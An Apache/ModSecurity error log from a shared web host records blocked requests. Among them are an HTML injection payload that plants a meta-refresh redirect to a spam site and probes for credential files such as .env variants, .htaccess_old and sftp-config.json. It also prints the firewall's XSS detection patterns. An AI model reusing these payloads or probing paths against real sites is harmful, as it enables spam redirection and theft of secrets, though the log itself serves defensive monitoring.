[Mon May 11 12:12:47.552795 2026] [security2:error] [pid 1256241:tid 1256266] [client 194.233.64.127:61359] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Jkjl.D8.9.Adl@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://YKM.De/student-aid-80028>Urutan Kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://YKM.De/student-aid-80028 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGrn5kIEwRJMyDaV55VbgAAAVQ"]
[Mon May 11 12:12:47.553197 2026] [security2:error] [pid 1256241:tid 1256266] [client 194.233.64.127:61359] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGrn5kIEwRJMyDaV55VbgAAAVQ"]
[Mon May 11 12:12:47.553491 2026] [security2:error] [pid 1256241:tid 1256266] [client 194.233.64.127:61359] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGrn5kIEwRJMyDaV55VbgAAAVQ"]
[Mon May 11 12:12:48.189766 2026] [security2:error] [pid 1254179:tid 1254194] [client 194.233.64.127:61371] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://jkjl.d8.9.adl@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://ykm.de/student-aid-80028>urutan kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://ykm.de/student-aid-80028 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGroGS6k_SCYd1AVZq2YAAAAQ0"]
[Mon May 11 12:12:48.190514 2026] [security2:error] [pid 1254179:tid 1254194] [client 194.233.64.127:61371] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://Jkjl.D8.9.Adl@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://YKM.De/student-aid-80028>Urutan Kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://YKM.De/student-aid-80028 /> found within ARGS:url: http://Jkjl.D8.9.Adl@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://YKM.De/student-aid-80028>Urutan Kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://YKM.De/student-aid-80028 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGroGS6k_SCYd1AVZq2YAAAAQ0"]
[Mon May 11 12:12:48.190672 2026] [security2:error] [pid 1254179:tid 1254194] [client 194.233.64.127:61371] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://YKM.De/student-aid-80028 /> found within ARGS:url: http://Jkjl.D8.9.Adl@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://YKM.De/student-aid-80028>Urutan Kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://YKM.De/student-aid-80028 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGroGS6k_SCYd1AVZq2YAAAAQ0"]
[Mon May 11 12:12:48.190773 2026] [security2:error] [pid 1254179:tid 1254194] [client 194.233.64.127:61371] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://Jkjl.D8.9.Adl@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://YKM.De/student-aid-80028>Urutan Kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://YKM.De/student-aid-80028 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGroGS6k_SCYd1AVZq2YAAAAQ0"]
[Mon May 11 12:12:48.190949 2026] [security2:error] [pid 1254179:tid 1254194] [client 194.233.64.127:61371] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Jkjl.D8.9.Adl@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://YKM.De/student-aid-80028>Urutan Kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=https://YKM.De/student-aid-80028 />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGroGS6k_SCYd1AVZq2YAAAAQ0"]
[Mon May 11 12:12:48.191643 2026] [security2:error] [pid 1254179:tid 1254194] [client 194.233.64.127:61371] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGroGS6k_SCYd1AVZq2YAAAAQ0"]
[Mon May 11 12:12:48.191913 2026] [security2:error] [pid 1254179:tid 1254194] [client 194.233.64.127:61371] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGroGS6k_SCYd1AVZq2YAAAAQ0"]
[Mon May 11 12:13:07.800415 2026] [:error] [pid 1256241:tid 1256266] [client 185.12.59.118:34778] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 12:13:07.911247 2026] [:error] [pid 1254242:tid 1254256] [client 76.68.67.246:11922] File does not exist: /home/piregwan/public_html/wp-login.php, referer: https://www.piregwan-genesis.com
[Mon May 11 12:13:08.410508 2026] [:error] [pid 1254328:tid 1254345] [client 76.68.67.246:58434] File does not exist: /home/piregwan/public_html/wp-login.php, referer: https://www.piregwan-genesis.com/wp-login.php?action=register
[Mon May 11 12:13:30.907076 2026] [security2:error] [pid 1256241:tid 1256261] [client 185.177.72.9:34128] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /php/.env.example-fix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/php/.env.example-fix"] [unique_id "agGrypkIEwRJMyDaV55WCAAAAU8"]
[Mon May 11 12:13:30.907665 2026] [security2:error] [pid 1256241:tid 1256261] [client 185.177.72.9:34128] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/php/.env.example-fix"] [unique_id "agGrypkIEwRJMyDaV55WCAAAAU8"]
[Mon May 11 12:13:32.516629 2026] [security2:error] [pid 1256241:tid 1256261] [client 185.177.72.9:34128] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGrypkIEwRJMyDaV55WCAAAAU8"]
[Mon May 11 12:13:32.550507 2026] [security2:error] [pid 1254212:tid 1254460] [client 185.177.72.9:34134] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /php/.env.example-fix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/php/.env.example-fix"] [unique_id "agGrzEYQeUtAPynIs6xgbQAAABg"]
[Mon May 11 12:13:32.550740 2026] [security2:error] [pid 1254212:tid 1254460] [client 185.177.72.9:34134] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/php/.env.example-fix"] [unique_id "agGrzEYQeUtAPynIs6xgbQAAABg"]
[Mon May 11 12:13:33.855627 2026] [ssl:error] [pid 1254328:tid 1254347] (EAI 2)Name or service not known: [client 198.235.24.163:57698] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 12:13:33.858189 2026] [ssl:error] [pid 1254328:tid 1254347] AH01941: stapling_renew_response: responder error
[Mon May 11 12:13:35.503266 2026] [security2:error] [pid 1254212:tid 1254460] [client 185.177.72.9:34134] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGrzEYQeUtAPynIs6xgbQAAABg"]
[Mon May 11 12:13:35.527902 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:59798] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /php/.htaccess_old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/php/.htaccess_old"] [unique_id "agGrzxjZymfuKpjWXeiEvwAAAMc"]
[Mon May 11 12:13:35.529038 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:59798] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/php/.htaccess_old"] [unique_id "agGrzxjZymfuKpjWXeiEvwAAAMc"]
[Mon May 11 12:13:36.473638 2026] [authz_core:error] [pid 1254179:tid 1254192] [client 95.111.239.37:52130] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/sitemaps/providers/error_log, referer: binance.com
[Mon May 11 12:13:36.957325 2026] [security2:error] [pid 1254133:tid 1254143] [client 185.177.72.9:59798] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGrzxjZymfuKpjWXeiEvwAAAMc"]
[Mon May 11 12:13:36.980262 2026] [security2:error] [pid 1254133:tid 1254158] [client 185.177.72.9:59814] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htaccess found within REQUEST_FILENAME: /php/.htaccess_old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/php/.htaccess_old"] [unique_id "agGr0BjZymfuKpjWXeiEwAAAANY"]
[Mon May 11 12:13:36.980474 2026] [security2:error] [pid 1254133:tid 1254158] [client 185.177.72.9:59814] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/php/.htaccess_old"] [unique_id "agGr0BjZymfuKpjWXeiEwAAAANY"]
[Mon May 11 12:13:38.285018 2026] [security2:error] [pid 1254133:tid 1254158] [client 185.177.72.9:59814] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGr0BjZymfuKpjWXeiEwAAAANY"]
[Mon May 11 12:13:43.060280 2026] [authz_core:error] [pid 1254328:tid 1254379] [client 95.111.239.37:54540] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/sitemaps/providers/error_log, referer: binance.com
[Mon May 11 12:13:48.962666 2026] [security2:error] [pid 1254133:tid 1254148] [client 185.177.72.9:4836] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /php/sftp-config.json.beta"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/php/sftp-config.json.beta"] [unique_id "agGr3BjZymfuKpjWXeiE2QAAAMw"]
[Mon May 11 12:13:48.963328 2026] [security2:error] [pid 1254133:tid 1254148] [client 185.177.72.9:4836] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/php/sftp-config.json.beta"] [unique_id "agGr3BjZymfuKpjWXeiE2QAAAMw"]
[Mon May 11 12:13:50.980099 2026] [authz_core:error] [pid 1254242:tid 1254248] [client 95.111.239.37:57180] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/widgets/error_log, referer: binance.com
[Mon May 11 12:13:51.441035 2026] [security2:error] [pid 1254133:tid 1254148] [client 185.177.72.9:4836] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGr3BjZymfuKpjWXeiE2QAAAMw"]
[Mon May 11 12:13:51.467379 2026] [security2:error] [pid 1254179:tid 1254205] [client 185.177.72.9:4852] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /php/sftp-config.json.beta"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/php/sftp-config.json.beta"] [unique_id "agGr32S6k_SCYd1AVZq2wAAAARg"]
[Mon May 11 12:13:51.467768 2026] [security2:error] [pid 1254179:tid 1254205] [client 185.177.72.9:4852] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/php/sftp-config.json.beta"] [unique_id "agGr32S6k_SCYd1AVZq2wAAAARg"]
[Mon May 11 12:13:52.889618 2026] [security2:error] [pid 1254179:tid 1254205] [client 185.177.72.9:4852] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGr32S6k_SCYd1AVZq2wAAAARg"]
[Mon May 11 12:13:55.371085 2026] [security2:error] [pid 1254133:tid 1254154] [client 185.177.72.9:50140] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /play/.env.archived"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/play/.env.archived"] [unique_id "agGr4xjZymfuKpjWXeiE4wAAANI"]
[Mon May 11 12:13:55.371852 2026] [security2:error] [pid 1254133:tid 1254154] [client 185.177.72.9:50140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/play/.env.archived"] [unique_id "agGr4xjZymfuKpjWXeiE4wAAANI"]
[Mon May 11 12:13:56.532502 2026] [security2:error] [pid 1254133:tid 1254154] [client 185.177.72.9:50140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGr4xjZymfuKpjWXeiE4wAAANI"]
